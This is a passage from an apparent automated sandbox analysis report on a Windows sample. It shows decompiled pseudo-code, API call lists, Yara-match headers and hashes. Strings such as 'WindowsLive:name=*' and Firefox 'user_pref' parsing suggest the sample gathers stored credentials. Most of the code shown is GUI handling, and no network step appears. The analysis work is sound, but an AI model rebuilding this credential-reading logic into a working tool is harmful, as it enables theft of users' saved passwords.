                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                • API String ID: 945165440-3589380929
                                                                                • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                                • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                				void _v259;
                                                                                				char _v260;
                                                                                				void _v4359;
                                                                                				char _v4360;
                                                                                				int _t17;
                                                                                				CHAR* _t26;
                                                                                
                                                                                				E004118A0(0x1104, __ecx);
                                                                                				_v4360 = 0;
                                                                                				memset( &_v4359, 0, 0x1000);
                                                                                				_t17 = GetDlgCtrlID(_a4);
                                                                                				_t35 = _t17;
                                                                                				GetWindowTextA(_a4,  &_v4360, 0x1000);
                                                                                				if(_t17 > 0 && _v4360 != 0) {
                                                                                					_v260 = 0;
                                                                                					memset( &_v259, 0, 0xff);
                                                                                					GetClassNameA(_a4,  &_v260, 0xff);
                                                                                					_t26 =  &_v260;
                                                                                					_push("sysdatetimepick32");
                                                                                					_push(_t26);
                                                                                					L004115B2();
                                                                                					if(_t26 != 0) {
                                                                                						E00407EC3(_t35,  &_v4360);
                                                                                					}
                                                                                				}
                                                                                				return 1;
                                                                                			}










                                                                                APIs
                                                                                • memset.MSVCRT ref: 00408011
                                                                                • GetDlgCtrlID.USER32 ref: 0040801C
                                                                                • GetWindowTextA.USER32 ref: 0040802F
                                                                                • memset.MSVCRT ref: 00408055
                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                                                • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                                                  • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                • String ID: sysdatetimepick32
                                                                                • API String ID: 896699463-4169760276
                                                                                • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                                                • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v16;
                                                                                				void* __esi;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				signed int _t76;
                                                                                				signed int _t89;
                                                                                				signed int _t90;
                                                                                				void* _t98;
                                                                                				void* _t101;
                                                                                				short* _t118;
                                                                                				unsigned int _t126;
                                                                                				intOrPtr _t128;
                                                                                				signed int _t131;
                                                                                				void* _t144;
                                                                                				intOrPtr* _t146;
                                                                                				short _t153;
                                                                                				signed int _t155;
                                                                                
                                                                                				_t129 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_t74 = _a4 - 0x4e;
                                                                                				_t155 = __ecx;
                                                                                				if(_t74 == 0) {
                                                                                					_t146 = _a12;
                                                                                					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
                                                                                					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
                                                                                						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                                                						if(__eflags == 0) {
                                                                                							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
                                                                                						}
                                                                                					}
                                                                                					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
                                                                                					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
                                                                                						L27:
                                                                                						_t75 = 0;
                                                                                						__eflags = 0;
                                                                                						goto L28;
                                                                                					} else {
                                                                                						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
                                                                                						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
                                                                                							goto L27;
                                                                                						}
                                                                                						_t76 =  *(_t146 + 0x14);
                                                                                						__eflags = _t76 & 0x00000002;
                                                                                						if((_t76 & 0x00000002) == 0) {
                                                                                							L36:
                                                                                							_t131 =  *(_t146 + 0x18) ^ _t76;
                                                                                							__eflags = 0x0000f000 & _t131;
                                                                                							if((0x0000f000 & _t131) == 0) {
                                                                                								L39:
                                                                                								__eflags =  *(_t146 + 0x14) & 0x00000002;
                                                                                								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
                                                                                									goto L27;
                                                                                								}
                                                                                								__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
                                                                                									goto L27;
                                                                                								}
                                                                                								__eflags =  *(_t146 + 0xc);
                                                                                								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
                                                                                								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
                                                                                								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
                                                                                								 *((intOrPtr*)(_t155 + 0x14)) = 1;
                                                                                								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
                                                                                								 *((intOrPtr*)(_t155 + 0x14)) = 0;
                                                                                								_t75 = 1;
                                                                                								L28:
                                                                                								return _t75;
                                                                                							}
                                                                                							L37:
                                                                                							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
                                                                                							__eflags = _t89 & 0x00000002;
                                                                                							if((_t89 & 0x00000002) != 0) {
                                                                                								_t90 = _t89 & 0x0000f000;
                                                                                								__eflags = _t90 - 0x1000;
                                                                                								_v8 = _t90;
                                                                                								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
                                                                                								_v16 - 0x2000 = _v16 == 0x2000;
                                                                                								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
                                                                                							}
                                                                                							goto L39;
                                                                                						}
                                                                                						__eflags =  *(_t146 + 0x18) & 0x00000002;
                                                                                						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
                                                                                							goto L37;
                                                                                						}
                                                                                						goto L36;
                                                                                					}
                                                                                				}
                                                                                				_t98 = _t74 - 0xc2;
                                                                                				if(_t98 == 0) {
                                                                                					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
                                                                                					E0040559F(_t155);
                                                                                					goto L27;
                                                                                				}
                                                                                				_t101 = _t98 - 1;
                                                                                				if(_t101 != 0) {
                                                                                					goto L27;
                                                                                				}
                                                                                				_t126 = _a8 >> 0x10;
                                                                                				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
                                                                                					L7:
                                                                                					if(_t126 != 0) {
                                                                                						goto L27;
                                                                                					}
                                                                                					if(_a8 != 0x3f0) {
                                                                                						L13:
                                                                                						if(_a8 == 0x3eb) {
                                                                                							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
                                                                                						}
                                                                                						if(_a8 == 0x3ec) {
                                                                                							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
                                                                                						}
                                                                                						if(_a8 == 0x3ee) {
                                                                                							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
                                                                                						}
                                                                                						if(_a8 == 0x3ef) {
                                                                                							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
                                                                                						}
                                                                                						if(_a8 == 2) {
                                                                                							EndDialog( *(_t155 + 4), 2);
                                                                                						}
                                                                                						if(_a8 == 1) {
                                                                                							E00405538(_t155);
                                                                                							EndDialog( *(_t155 + 4), 1);
                                                                                						}
                                                                                						_t75 = 1;
                                                                                						goto L28;
                                                                                					}
                                                                                					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
                                                                                					_t129 = 0;
                                                                                					if(_t128 <= 0) {
                                                                                						L12:
                                                                                						E0040559F(_t155);
                                                                                						goto L13;
                                                                                					}
                                                                                					_t144 = 0;
                                                                                					do {
                                                                                						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
                                                                                						 *(_t118 + 2) = _t129;
                                                                                						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
                                                                                						_t129 = _t129 + 1;
                                                                                						_t144 = _t144 + 0x14;
                                                                                						 *_t118 = _t153;
                                                                                					} while (_t129 < _t128);
                                                                                					goto L12;
                                                                                				} else {
                                                                                					if(_a8 != 0x3ed) {
                                                                                						goto L27;
                                                                                					} else {
                                                                                						E004054C6(__ecx, __ecx);
                                                                                						goto L7;
                                                                                					}
                                                                                				}
                                                                                			}





















                                                                                0x00405858
                                                                                0x004058a0
                                                                                0x004058aa
                                                                                0x004058b2
                                                                                0x004058b4
                                                                                0x004058b6
                                                                                0x004058ba
                                                                                0x004058c2
                                                                                0x004058ce
                                                                                0x004058dd
                                                                                0x004058e8
                                                                                0x004058e8
                                                                                0x00000000
                                                                                0x004058b4
                                                                                0x00405891
                                                                                0x00405895
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405895
                                                                                0x0040587e
                                                                                0x0040572d
                                                                                0x00405732
                                                                                0x00405844
                                                                                0x0040584b
                                                                                0x00000000
                                                                                0x0040584b
                                                                                0x00405738
                                                                                0x00405739
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405742
                                                                                0x00405748
                                                                                0x00405762
                                                                                0x00405765
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405771
                                                                                0x004057a6
                                                                                0x004057b7
                                                                                0x004057bf
                                                                                0x004057bf
                                                                                0x004057ca
                                                                                0x004057d2
                                                                                0x004057d2
                                                                                0x004057dd
                                                                                0x004057e8
                                                                                0x004057ee
                                                                                0x004057f5
                                                                                0x00405800
                                                                                0x00405806
                                                                                0x00405812
                                                                                0x00405819
                                                                                0x00405819
                                                                                0x00405820
                                                                                0x00405822
                                                                                0x0040582c
                                                                                0x0040582c
                                                                                0x00405830
                                                                                0x00000000
                                                                                0x00405830
                                                                                0x00405776
                                                                                0x00405779
                                                                                0x0040577d
                                                                                0x004057a0
                                                                                0x004057a1
                                                                                0x00000000
                                                                                0x004057a1
                                                                                0x0040577f
                                                                                0x00405781
                                                                                0x00405786
                                                                                0x00405789
                                                                                0x00405790
                                                                                0x00405795
                                                                                0x00405796
                                                                                0x0040579b
                                                                                0x0040579b
                                                                                0x00000000
                                                                                0x00405751
                                                                                0x00405757
                                                                                0x00000000
                                                                                0x0040575d
                                                                                0x0040575d
                                                                                0x00000000
                                                                                0x0040575d
                                                                                0x00405757

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 004057BD
                                                                                • GetDlgItem.USER32 ref: 004057D0
                                                                                • GetDlgItem.USER32 ref: 004057E5
                                                                                • GetDlgItem.USER32 ref: 004057FD
                                                                                • EndDialog.USER32(?,00000002), ref: 00405819
                                                                                • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                                  • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                                                  • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                                  • Part of subcall function 004054C6: SendMessageA.USER32 ref: 00405505
                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$DialogMessageSend
                                                                                • String ID:
                                                                                • API String ID: 2485852401-0
                                                                                • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                                                • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
                                                                                				RECT* _v8;
                                                                                				void* __esi;
                                                                                				void* _t39;
                                                                                				signed int _t41;
                                                                                				void* _t42;
                                                                                				struct HWND__* _t47;
                                                                                				signed int _t53;
                                                                                				void* _t54;
                                                                                				signed int _t76;
                                                                                				signed int _t78;
                                                                                				void* _t80;
                                                                                				void** _t82;
                                                                                				signed int _t86;
                                                                                				void* _t90;
                                                                                				signed int _t91;
                                                                                
                                                                                				_t80 = __edi;
                                                                                				_push(_t58);
                                                                                				_push(0xc);
                                                                                				_v8 = 0;
                                                                                				 *((intOrPtr*)(__edi + 0x10)) = __eax;
                                                                                				L004115D0();
                                                                                				if(__eax == 0) {
                                                                                					_t82 = 0;
                                                                                				} else {
                                                                                					 *((intOrPtr*)(__eax)) = 0;
                                                                                					_t82 = __eax;
                                                                                				}
                                                                                				 *(_t80 + 0xc) = _t82;
                                                                                				_t39 =  *_t82;
                                                                                				_t90 = _t39;
                                                                                				if(_t90 != 0) {
                                                                                					_push(_t39);
                                                                                					L004115D6();
                                                                                					 *_t82 = 0;
                                                                                				}
                                                                                				_t82[2] = _a8;
                                                                                				_t41 = E004049FB(_a8);
                                                                                				_t76 = 4;
                                                                                				_t82[1] = _t41;
                                                                                				_t42 = _t41 * _t76;
                                                                                				_push( ~(0 | _t90 > 0x00000000) | _t42);
                                                                                				L004115D0();
                                                                                				 *_t82 = _t42;
                                                                                				memset(_t42, 0, _t82[1] << 2);
                                                                                				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                                				_t91 =  *(_t80 + 0x10);
                                                                                				if(_t91 == 0) {
                                                                                					_t86 = ( *(_t80 + 0xc))[1];
                                                                                					_t78 = 0x14;
                                                                                					_t53 = _t86 * _t78;
                                                                                					_push( ~(0 | _t91 > 0x00000000) | _t53);
                                                                                					L004115D0();
                                                                                					 *(_t80 + 0x10) = _t53;
                                                                                					if(_t86 > 0) {
                                                                                						_t54 = 0;
                                                                                						do {
                                                                                							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
                                                                                							_t54 = _t54 + 0x14;
                                                                                							_t86 = _t86 - 1;
                                                                                						} while (_t86 != 0);
                                                                                					}
                                                                                					_v8 = 1;
                                                                                				}
                                                                                				if(E00401540(0x448, _t80, _a4) == 1) {
                                                                                					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
                                                                                					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
                                                                                				}
                                                                                				_t47 = SetFocus(_a8);
                                                                                				if(_v8 != 0) {
                                                                                					_push( *(_t80 + 0x10));
                                                                                					L004115D6();
                                                                                				}
                                                                                				return _t47;
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                • String ID:
                                                                                • API String ID: 2313361498-0
                                                                                • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                                • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040A698(void* __esi) {
                                                                                				struct HDWP__* _v8;
                                                                                				int _v12;
                                                                                				intOrPtr _v16;
                                                                                				struct tagRECT _v32;
                                                                                				struct tagRECT _v48;
                                                                                				void* _t32;
                                                                                				int _t60;
                                                                                				int _t65;
                                                                                
                                                                                				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
                                                                                					GetClientRect( *(__esi + 0x108),  &_v32);
                                                                                					GetWindowRect( *(__esi + 0x114),  &_v48);
                                                                                					_t65 = _v48.bottom - _v48.top + 1;
                                                                                					GetWindowRect( *(__esi + 0x118),  &_v48);
                                                                                					_v12 = _v32.right - _v32.left;
                                                                                					_t60 = _v48.bottom - _v48.top + 1;
                                                                                					_v16 = _v32.bottom - _v32.top;
                                                                                					_v8 = BeginDeferWindowPos(3);
                                                                                					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
                                                                                					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
                                                                                					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
                                                                                					return EndDeferWindowPos(_v8);
                                                                                				}
                                                                                				return _t32;
                                                                                			}

                                                                                APIs
                                                                                • GetClientRect.USER32 ref: 0040A6B7
                                                                                • GetWindowRect.USER32 ref: 0040A6CD
                                                                                • GetWindowRect.USER32 ref: 0040A6E0
                                                                                • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                                • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                • String ID:
                                                                                • API String ID: 2126104762-0
                                                                                • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                                • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E00406069(void* _a4) {
                                                                                				signed int _t11;
                                                                                				int _t13;
                                                                                				void* _t17;
                                                                                				signed int _t19;
                                                                                				void* _t22;
                                                                                
                                                                                				_t22 = _a4;
                                                                                				_t19 = 0;
                                                                                				EmptyClipboard();
                                                                                				if(_t22 != 0) {
                                                                                					_t2 = strlen(_t22) + 1; // 0x1
                                                                                					_t13 = _t2;
                                                                                					_t17 = GlobalAlloc(0x2000, _t13);
                                                                                					if(_t17 != 0) {
                                                                                						memcpy(GlobalLock(_t17), _t22, _t13);
                                                                                						GlobalUnlock(_t17);
                                                                                						_t11 = SetClipboardData(1, _t17);
                                                                                						asm("sbb esi, esi");
                                                                                						_t19 =  ~( ~_t11);
                                                                                					}
                                                                                				}
                                                                                				CloseClipboard();
                                                                                				return _t19;
                                                                                			}









                                                                                APIs
                                                                                • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                                • strlen.MSVCRT ref: 0040607E
                                                                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                                • GlobalLock.KERNEL32 ref: 0040609A
                                                                                • memcpy.MSVCRT ref: 004060A3
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 004060B5
                                                                                • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 3116012682-0
                                                                                • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                                • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 80%
                                                                                			E0040C530(void* __eflags, intOrPtr* _a4) {
                                                                                				int _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _v16;
                                                                                				void _v1029;
                                                                                				void _v1039;
                                                                                				char _v1040;
                                                                                				void _v2063;
                                                                                				void _v2064;
                                                                                				void _v3087;
                                                                                				void _v3088;
                                                                                				void* __ebx;
                                                                                				intOrPtr _t53;
                                                                                				void* _t54;
                                                                                				void* _t56;
                                                                                				void* _t59;
                                                                                				void* _t60;
                                                                                				void* _t67;
                                                                                				void* _t68;
                                                                                				void* _t73;
                                                                                				void* _t85;
                                                                                				int _t86;
                                                                                				void* _t106;
                                                                                				int _t107;
                                                                                				int _t111;
                                                                                				void* _t114;
                                                                                				void* _t115;
                                                                                				void* _t116;
                                                                                
                                                                                				_v1040 = 0;
                                                                                				memset( &_v1039, 0, 0x3ff);
                                                                                				_v3088 = 0;
                                                                                				memset( &_v3087, 0, 0x3ff);
                                                                                				_v2064 = 0;
                                                                                				memset( &_v2063, 0, 0x3ff);
                                                                                				_t116 = _t115 + 0x24;
                                                                                				_t53 = E00406B74(_a4 + 4);
                                                                                				_v12 = 0;
                                                                                				_v16 = _t53;
                                                                                				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
                                                                                				if(_t54 != 0) {
                                                                                					do {
                                                                                						_t56 = E004069D2(0, "user_pref(\"");
                                                                                						_pop(_t92);
                                                                                						if(_t56 != 0) {
                                                                                							goto L10;
                                                                                						}
                                                                                						_push(0x412b10);
                                                                                						_t60 = 0xb;
                                                                                						_t14 = E004069D2(_t60) - 0xb; // -11
                                                                                						_t92 = _t14;
                                                                                						_v8 = _t92;
                                                                                						if(_t92 <= 0) {
                                                                                							goto L10;
                                                                                						}
                                                                                						_t85 = E004069D2(_t61 + 1, 0x412b18);
                                                                                						_t17 = _t85 + 1; // 0x1
                                                                                						_t106 = E004069D2(_t17, 0x412b10);
                                                                                						if(_t106 <= 0) {
                                                                                							_t28 = _t85 + 1; // 0x1
                                                                                							_t67 = E004069D2(_t28, ")");
                                                                                							_pop(_t92);
                                                                                							_t68 = 0xfffffffe;
                                                                                							_t111 = _t67 + _t68 - _t85;
                                                                                							if(_t111 <= 0) {
                                                                                								goto L10;
                                                                                							}
                                                                                							_t107 = _v8;
                                                                                							memcpy( &_v3088,  &_v1029, _t107);
                                                                                							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
                                                                                							_t73 = _t114 + _t85 - 0x40a;
                                                                                							L9:
                                                                                							memcpy( &_v2064, _t73, _t111);
                                                                                							_t92 = _a4;
                                                                                							_t116 = _t116 + 0x18;
                                                                                							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
                                                                                							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
                                                                                							if(_t59 == 0) {
                                                                                								break;
                                                                                							}
                                                                                							goto L10;
                                                                                						}
                                                                                						_t20 = _t106 + 1; // 0x1
                                                                                						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
                                                                                						_pop(_t92);
                                                                                						if(_t111 <= 0) {
                                                                                							goto L10;
                                                                                						}
                                                                                						_t86 = _v8;
                                                                                						memcpy( &_v3088,  &_v1029, _t86);
                                                                                						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
                                                                                						_t73 = _t114 + _t106 - 0x40b;
                                                                                						goto L9;
                                                                                						L10:
                                                                                						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
                                                                                					} while (_t59 != 0);
                                                                                					return _t59;
                                                                                				}
                                                                                				return _t54;
                                                                                			}































                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen$_memicmp
                                                                                • String ID: user_pref("
                                                                                • API String ID: 765841271-2487180061
                                                                                • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                                • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 61%
                                                                                			E0040559F(intOrPtr _a4) {
                                                                                				struct HWND__* _v12;
                                                                                				signed int _v16;
                                                                                				int _v20;
                                                                                				int _v24;
                                                                                				intOrPtr _v28;
                                                                                				intOrPtr _v32;
                                                                                				int _v48;
                                                                                				char* _v52;
                                                                                				void* _v64;
                                                                                				void _v319;
                                                                                				char _v320;
                                                                                				struct HWND__* _t53;
                                                                                				intOrPtr* _t59;
                                                                                				void* _t61;
                                                                                				intOrPtr _t66;
                                                                                				void* _t74;
                                                                                				void* _t80;
                                                                                				intOrPtr _t81;
                                                                                				void* _t84;
                                                                                				intOrPtr _t89;
                                                                                				short _t91;
                                                                                				signed int _t94;
                                                                                				short* _t95;
                                                                                				void* _t96;
                                                                                				void* _t97;
                                                                                
                                                                                				_t89 = _a4;
                                                                                				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
                                                                                				_v12 = _t53;
                                                                                				SendMessageA(_t53, 0x1009, 0, 0);
                                                                                				SendMessageA(_v12, 0x1036, 0, 0x26);
                                                                                				do {
                                                                                				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
                                                                                				_push(0xc8);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(_v12);
                                                                                				_t80 = 6;
                                                                                				E00404925(0x412466, _t80);
                                                                                				_t59 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                				_t81 =  *((intOrPtr*)(_t59 + 4));
                                                                                				_t97 = _t96 + 0x10;
                                                                                				_v32 = _t81;
                                                                                				_v28 =  *_t59;
                                                                                				_v20 = 0;
                                                                                				if(_t81 <= 0) {
                                                                                					L10:
                                                                                					_t61 = 2;
                                                                                					E004048B6(_t61, _v12, 0, _t61);
                                                                                					return SetFocus(_v12);
                                                                                				} else {
                                                                                					goto L3;
                                                                                				}
                                                                                				do {
                                                                                					L3:
                                                                                					_v16 = 0;
                                                                                					_v24 = 0;
                                                                                					do {
                                                                                						_t94 = _v16 << 2;
